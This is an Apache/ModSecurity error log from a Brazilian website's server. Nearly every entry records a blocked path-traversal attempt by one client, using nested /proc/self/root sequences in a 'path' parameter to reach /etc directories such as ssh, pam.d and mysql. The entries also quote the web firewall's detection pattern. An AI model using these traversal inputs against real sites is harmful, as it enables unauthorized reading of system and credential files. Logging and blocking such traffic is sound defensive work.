[Tue Mar 17 22:25:24.178366 2026] [:error] [pid 16560:tid 140411649607424] [client 74.7.241.31:34336] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_BK6gUSg3B_dEMdIXgwAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:24.384084 2026] [:error] [pid 16560:tid 140411607643904] [client 74.7.241.31:34336] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_BK6gUSg3B_dEMdIXhAAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:25.790895 2026] [:error] [pid 2598:tid 140411733534464] [client 74.7.241.31:34340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_BRj0p0SRWAqcjGGqUQAAAwE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:27.439527 2026] [:error] [pid 14206:tid 140411691570944] [client 74.7.241.31:59364] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_B-mGQQJ-Dl0Hqn5G4QAAAAY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:29.089307 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:34328] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:25:30.275126 2026] [:error] [pid 14206:tid 140411540502272] [client 74.7.241.31:59364] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_CumGQQJ-Dl0Hqn5G6AAAABg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:31.762422 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:59374] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_C9a6ubjKNq_cu4Y15gAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:31.983933 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:59374] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_C9a6ubjKNq_cu4Y15wAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:33.311478 2026] [:error] [pid 16560:tid 140411741927168] [client 74.7.241.31:59380] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_Da6gUSg3B_dEMdIXhwAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:33.773074 2026] [:error] [pid 16560:tid 140411649607424] [client 74.7.241.31:59380] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_Da6gUSg3B_dEMdIXiAAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:35.143245 2026] [:error] [pid 18211:tid 140411683178240] [client 74.7.241.31:59382] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_DxcIZFNFgEhGGCRHZgAAA8c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:37.226002 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.241.31:59398] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_EdY0UrI5A3LftIwvBAAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:38.971327 2026] [:error] [pid 25836:tid 140411741927168] [client 74.7.241.31:47194] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_Eoh-PF_25v4hFRCbiwAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:41.048884 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.241.31:47210] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_FeyqAr6etmhZHNpWuAAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:42.581784 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.241.31:47220] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_FgkwaGbbGflqUZCz3AAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:45.499362 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.241.31:47234] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_GdY0UrI5A3LftIwvCAAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:49.470873 2026] [:error] [pid 2598:tid 140411683178240] [client 74.7.241.31:58266] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_HRj0p0SRWAqcjGGqWQAAAwc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:52.161773 2026] [proxy_fcgi:error] [pid 19507:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:35056] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:25:54.343267 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.241.31:58272] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_ItY0UrI5A3LftIwvCwAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:55.918137 2026] [:error] [pid 14206:tid 140411548894976] [client 74.7.241.31:58286] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_I-mGQQJ-Dl0Hqn5HAwAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:59.521782 2026] [:error] [pid 14206:tid 140411725141760] [client 74.7.241.31:51924] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_J-mGQQJ-Dl0Hqn5HCgAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:26:01.487618 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.241.31:51936] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_KdY0UrI5A3LftIwvDQAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:26:03.013997 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.241.31:51946] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_K-yqAr6etmhZHNpWvQAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:26:04.491536 2026] [:error] [pid 16560:tid 140411649607424] [client 74.7.241.31:51962] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_LK6gUSg3B_dEMdIXnAAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:26:16.161781 2026] [proxy_fcgi:error] [pid 14206:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:35830] AH01075: Error dispatching request to : (polling)
